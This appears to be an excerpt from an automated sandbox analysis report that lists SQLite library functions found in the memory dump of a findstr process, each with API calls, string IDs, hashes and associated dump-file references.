                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                    • String ID: winDelete
                                                                                                    • API String ID: 3336177498-3936022152
                                                                                                    • Opcode ID: a203cf13cae4562c00d6b139ff0b3870a1807026c047d59295c7ff7bc1f39ddc
                                                                                                    • Instruction ID: 02c673530a8475da01aad88e9451bd0e6ec24a3312d474951fd084080d80703e
                                                                                                    • Opcode Fuzzy Hash: a203cf13cae4562c00d6b139ff0b3870a1807026c047d59295c7ff7bc1f39ddc
                                                                                                    • Instruction Fuzzy Hash: 6C31C271A086968FFF015FA5C4A0A9DB7B5FF4A308F70C629EC6097380D738D8868752
                                                                                                    Function 61E5C785 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3
                                                                                                    • API String ID: 0-1842515611
                                                                                                    • Opcode ID: 88f9cacac7ba4c3608defab87cf8be88bb378e546e5ec0b93bfe6ddcc967d667
                                                                                                    • Instruction ID: 60279a185ec838b87b124ab7718d8fdf7fd66dc082f57b5cd6809a44e05db8a3
                                                                                                    • Opcode Fuzzy Hash: 88f9cacac7ba4c3608defab87cf8be88bb378e546e5ec0b93bfe6ddcc967d667
                                                                                                    • Instruction Fuzzy Hash: 28317C74A042558BDB50CF24C4D0B89BBF4BF49328F24C2A9DD989B346D376E8A5CBC1
                                                                                                    Function 61E88E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQuery
                                                                                                    • String ID: @
                                                                                                    • API String ID: 1027372294-2766056989
                                                                                                    • Opcode ID: 6d35adeeeb3f8ef573de6f39659106b51709b20330c5ddce508fd987bc45c707
                                                                                                    • Instruction ID: 6f21b70adb1843e6fc26e35fcbdf5d60bc67e9b288e60c375e0aa6799e3dc4f4
                                                                                                    • Opcode Fuzzy Hash: 6d35adeeeb3f8ef573de6f39659106b51709b20330c5ddce508fd987bc45c707
                                                                                                    • Instruction Fuzzy Hash: 37316BB6905B118FD740DF68C984A0AFBE1FB84354F69C919ED5C97340E330E884CB52
                                                                                                    Function 61E7580D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E75846
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E758AB
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: a
                                                                                                    • API String ID: 4224044155-581836851
                                                                                                    • Opcode ID: 2b5d54f3f4f949fbc6bd26296de869642909ab249083b2e1c0beabccf47a2b52
                                                                                                    • Instruction ID: d65c728597c8b6bef92945250ebd451241275b8c50f15fd2ec17e05415f46780
                                                                                                    • Opcode Fuzzy Hash: 2b5d54f3f4f949fbc6bd26296de869642909ab249083b2e1c0beabccf47a2b52
                                                                                                    • Instruction Fuzzy Hash: 3F110774A046569BEB00DFA9C48065EF7B5BF88318F24C52EEC989B344DB34E841CB91
                                                                                                    Function 61E03C9E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_stricmp.SQLITE3(00000000,?,?,61E5D610), ref: 61E03D18
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: sqlite_master$sqlite_temp_master
                                                                                                    • API String ID: 912767213-3047539776
                                                                                                    • Opcode ID: af4935931f537cc450c6a6c4e86a5055fef076d7b5a2f4d21341d28f2f1f2f8c
                                                                                                    • Instruction ID: f4f2298b31a0f57ac18bf435e45304080686ef528cf8b675e3225f4182d8429b
                                                                                                    • Opcode Fuzzy Hash: af4935931f537cc450c6a6c4e86a5055fef076d7b5a2f4d21341d28f2f1f2f8c
                                                                                                    • Instruction Fuzzy Hash: 231156B5A002568FAB04DFAED88195BB7F4FF84319B258865DC24EB301D770D92187A1
                                                                                                    Function 61E23691 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_snprintf.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E237C6,?,?,?,61E237EA,00000000), ref: 61E236EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf
                                                                                                    • String ID: a
                                                                                                    • API String ID: 949980604-581836851
                                                                                                    • Opcode ID: 91bf74c65e68fb04c8335b9113e5e49d0315283b8d78463fa59dab29ac2aae63
                                                                                                    • Instruction ID: f6cbed5fa004bcf969ea95e97dbd5963f19ed510e3a23f13f58c75b7caaee582
                                                                                                    • Opcode Fuzzy Hash: 91bf74c65e68fb04c8335b9113e5e49d0315283b8d78463fa59dab29ac2aae63
                                                                                                    • Instruction Fuzzy Hash: 44117FB0A083858BDB00DF69D49571ABFE0AF89314F24C4ADE8988B356D379D801CB95
                                                                                                    Function 61E1EC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1EC49
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E1EC55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265351223-3916222277
                                                                                                    • Opcode ID: 03124e6a7aef1422490c631bf445384244d088258885ba2326f646a7621e297a
                                                                                                    • Instruction ID: af3a916426fe0bf696c1035225ccb1561f9e74b541cde50b2172e9102339d3e9
                                                                                                    • Opcode Fuzzy Hash: 03124e6a7aef1422490c631bf445384244d088258885ba2326f646a7621e297a
                                                                                                    • Instruction Fuzzy Hash: 191165305086858BDF069FA9C4C535A7FF1EF99318F608498E8949B349E731D960C7D2
                                                                                                    Function 61E1F2BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int
                                                                                                    • String ID: 7a
                                                                                                    • API String ID: 940139405-935942030
                                                                                                    • Opcode ID: cc6c106f65d8d6527a6853658c58ada444115218185bad495e49c4ed103faf5d
                                                                                                    • Instruction ID: 6b53729e4777fac2577d30a313053445165783d29967039423c2de8483378703
                                                                                                    • Opcode Fuzzy Hash: cc6c106f65d8d6527a6853658c58ada444115218185bad495e49c4ed103faf5d
                                                                                                    • Instruction Fuzzy Hash: 27016275D0860ADBCB00DF6AD48548FB7A1FA45374B20C52AE8688B300D335E992CBC0
                                                                                                    Function 61E2743E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: reallocsqlite3_log
                                                                                                    • String ID: ja
                                                                                                    • API String ID: 576635218-4192907673
                                                                                                    • Opcode ID: cab8d764478f3cc2c50619ebf4d9914f377435e6eb4d5f9e97e8b361d14ebf65
                                                                                                    • Instruction ID: d8c9123a3a49a5dbd035ea26abe5579544f53d26066233c3b80c5888969192af
                                                                                                    • Opcode Fuzzy Hash: cab8d764478f3cc2c50619ebf4d9914f377435e6eb4d5f9e97e8b361d14ebf65
                                                                                                    • Instruction Fuzzy Hash: F5F0F97080930ADFDB50DF5AC88055AFFE4EF84258F10C95DE99C4B341D234E944CB91
                                                                                                    Function 61E1778C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 61E177B8
                                                                                                    • sqlite3_win32_sleep.SQLITE3 ref: 61E177DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSectionsqlite3_win32_sleep
                                                                                                    • String ID: HF
                                                                                                    • API String ID: 3721583994-543897734
                                                                                                    • Opcode ID: 15afc8547e24b2a275295f3a8930a19be814a30d9ed2d2e97d1e8aa978412027
                                                                                                    • Instruction ID: 94f48dc09292556bbcf9a3c9617f0bc294fdf8240cc83740efab59533c3511ff
                                                                                                    • Opcode Fuzzy Hash: 15afc8547e24b2a275295f3a8930a19be814a30d9ed2d2e97d1e8aa978412027
                                                                                                    • Instruction Fuzzy Hash: DFF0273481D2119BDB00AA58C94238E7BE8FB4975AF60883AC44487204D735D0C087D2
                                                                                                    Function 61E28BB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5CB65), ref: 61E28BFA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: %a$Ra
                                                                                                    • API String ID: 632333372-2165777612
                                                                                                    • Opcode ID: af3219847a3537b00ddd95d194e4fda69e012d5791079b8f53a6eccfcc50ecd2
                                                                                                    • Instruction ID: 54e453b86644c98d42bf4d3b854f3a2ecff178396eef6d2c7becdacd7e064464
                                                                                                    • Opcode Fuzzy Hash: af3219847a3537b00ddd95d194e4fda69e012d5791079b8f53a6eccfcc50ecd2
                                                                                                    • Instruction Fuzzy Hash: 70E0DFB02097418BF3045BAA8523B06BAE46BC0388F30C42DD89887395EBB0D481A343
                                                                                                    Function 61E274E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_intsqlite3_value_text
                                                                                                    • String ID: a
                                                                                                    • API String ID: 3072509329-581836851
                                                                                                    • Opcode ID: 07f0d302396d2b7972cb1ddc3a6258b9a52aa55105b608bdf947151053f3ca0d
                                                                                                    • Instruction ID: 69e9ee0bcd1793300845458a466b9f9e1e2faeed39614b47462cb0066e70609f
                                                                                                    • Opcode Fuzzy Hash: 07f0d302396d2b7972cb1ddc3a6258b9a52aa55105b608bdf947151053f3ca0d
                                                                                                    • Instruction Fuzzy Hash: 85E04F70904799DBCB00EF69C4C559ABBE8FB08360B10C95AEC588B301D375E450CBD1